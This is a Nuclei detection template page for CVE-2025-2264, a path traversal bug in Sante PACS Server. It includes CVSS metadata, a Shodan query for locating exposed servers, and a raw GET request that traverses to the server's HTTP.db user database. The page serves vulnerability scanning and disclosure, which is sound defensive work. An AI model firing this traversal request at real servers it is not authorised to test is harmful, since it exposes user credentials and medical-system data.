Sante PACS Server.exe - Path Traversal Information Disclosure

ID: CVE-2025-2264

Severity: high

Author: DhiyaneshDK

Tags: cve,cve2024,sante,pacs,lfi

Description

A Path Traversal Information Disclosure vulnerability exists in “Sante PACS Server.exe”. An unauthenticated remote attacker can exploit it to download arbitrary files on the disk drive where the application is installed.

YAML Source

id: CVE-2025-2264

info:
  name: Sante PACS Server.exe - Path Traversal Information Disclosure
  author: DhiyaneshDK
  severity: high
  description: |
    A Path Traversal Information Disclosure vulnerability exists in "Sante PACS Server.exe". An unauthenticated remote attacker can exploit it to download arbitrary files on the disk drive where the application is installed.
  reference:
    - https://www.tenable.com/security/research/tra-2025-08
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2025-2264
    cwe-id: CWE-22
    epss-score: 0.00167
    epss-percentile: 0.34559
    cpe: cpe:2.3:a:santesoft:sante_pacs_server:4.1.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: santesoft
    product: sante_pacs_server
    shodan-query: http.favicon.hash:1185161484
  tags: cve,cve2024,sante,pacs,lfi

http:
  - raw:
      - |
        GET /assets/../../.HTTP/HTTP.db HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - "contains_all(body, 'SQLite','TABLE USER','format')"
          - "status_code == 200"
        condition: and
# digest: 490a0046304402200c94737e6db2ae4a4937778624cce571ede60ddff44f9cee643e82f11f6ffb3302200693b6be62c1fd31d76cf3b65dd9b536639c71dc28f560ad4d18d6f40ef9063f:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

$ nuclei -u "URL" -t "http/cves/2025/CVE-2025-2264.yaml"

View on Github